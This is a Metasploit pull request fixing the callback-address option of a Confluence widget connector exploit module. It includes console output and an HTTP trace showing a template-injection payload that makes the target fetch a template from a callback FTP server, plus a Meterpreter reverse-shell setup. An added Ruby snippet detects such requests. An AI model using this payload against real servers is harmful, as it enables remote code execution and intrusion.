Make SRVHOST the callback address in confluence_widget_connector #12013

Merged
merged 2 commits into from Jun 25, 2019

@wvu-r7
Contributor

commented Jun 25, 2019

Fixes #12012. Please read that issue for repro.

Note that this also fixes the target_platform check: an empty string is returned, not nil.

msf5 exploit(multi/http/confluence_widget_connector) > run

[-] Exploit failed: The following options failed to validate: SRVHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) > options

Module options (exploit/multi/http/confluence_widget_connector):

   Name        Current Setting                              Required  Description
   ----        ---------------                              --------  -----------
   PASVPORT    0                                            no        The local PASV data port to listen on (0 is random)
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1                                    yes       The target address range or CIDR identifier
   RPORT       8090                                         yes       The target port (TCP)
   SRVHOST                                                  yes       Callback address for template loading
   SRVPORT     8021                                         yes       The local port to listen on.
   SSL         false                                        no        Negotiate SSL for incoming connections
   SSLCert                                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI   /                                            yes       The base to Confluence
   TRIGGERURL  https://www.youtube.com/watch?v=kxopViU98Xo  yes       Url to external video service to trigger vulnerability
   VHOST                                                    no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java


msf5 exploit(multi/http/confluence_widget_connector) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set httptrace true
httptrace => true
msf5 exploit(multi/http/confluence_widget_connector) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the FTP server.
[*] Started service listener on 127.0.0.1:8021
********************
####################
# Request:
####################
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Origin: http://127.0.0.1:8090/
Content-Type: application/json; charset=UTF-8
Content-Length: 168

{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=kxopViU98Xo","_template":"ftp://127.0.0.1:8021/lHmYHjavaprop.vm"}}}
[-] The connection was refused by the remote host (127.0.0.1:8090).
[!] Connection timed out in #inject_template
[-] Exploit aborted due to failure: unreachable: Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) >
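
Added example, not part of the original pull request or the Metasploit code base: a Ruby check a defender could run over captured requests, flagging a macro preview POST whose JSON carries a client-supplied `_template` parameter, as in the HTTP trace above. The sample request is constructed from that trace, and the function names are hypothetical.

```ruby
require 'json'
require 'uri'

# Endpoint seen in the HTTP trace above; a context path may precede it.
PREVIEW_PATH = '/rest/tinymce/1/macro/preview'

# Split a raw HTTP/1.1 request into [verb, path, body].
def parse_request(raw)
  head, body = raw.to_s.split(/\r?\n\r?\n/, 2)
  verb, target, = head.to_s.lines.first.to_s.split(' ', 3)
  [verb, target.to_s.split('?', 2).first.to_s, body.to_s]
end

# Returns nil for requests of no interest, otherwise a finding hash.
# Any client-supplied _template is reported; :remote marks one that
# names a host, i.e. a template fetched from outside the server.
def suspicious_template(raw)
  verb, path, body = parse_request(raw)
  return nil unless verb == 'POST' && path.end_with?(PREVIEW_PATH)

  doc = begin
    JSON.parse(body)
  rescue JSON::ParserError
    nil
  end
  macro = doc.is_a?(Hash) ? doc['macro'] : nil
  params = macro.is_a?(Hash) ? macro['params'] : nil
  return nil unless params.is_a?(Hash) && params.key?('_template')

  template = params['_template'].to_s
  uri = begin
    URI.parse(template)
  rescue URI::InvalidURIError
    nil
  end
  { template: template, scheme: uri&.scheme, remote: !uri&.host.nil? }
end

# Constructed sample, shortened from the request in the trace above.
SAMPLE = <<~REQ
  POST /rest/tinymce/1/macro/preview HTTP/1.1
  Host: 127.0.0.1:8090
  Content-Type: application/json; charset=UTF-8

  {"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=kxopViU98Xo","_template":"ftp://127.0.0.1:8021/lHmYHjavaprop.vm"}}}
REQ

p suspicious_template(SAMPLE) if $PROGRAM_NAME == __FILE__
```

A finding with `remote: true` means the template would be loaded from another host, which is the case the SRVHOST callback address serves in the trace.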

@wvu-r7 wvu-r7 requested a review from asoto-r7 Jun 25, 2019

@wvu-r7 wvu-r7 added the easy label Jun 25, 2019

@asoto-r7 asoto-r7 self-assigned this Jun 25, 2019

@asoto-r7

Contributor

commented Jun 25, 2019

Tested both original and revised versions. Both the check and exploit methods work great. Thanks for knocking this one out! 👍

@asoto-r7 asoto-r7 merged commit 5c14aea into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

asoto-r7 added a commit that referenced this pull request Jun 25, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wvu-r7

Contributor Author

commented Jun 25, 2019

You rock. Thanks for handling this so quickly!

@wvu-r7 wvu-r7 deleted the wvu-r7:bug/confluence branch Jun 25, 2019
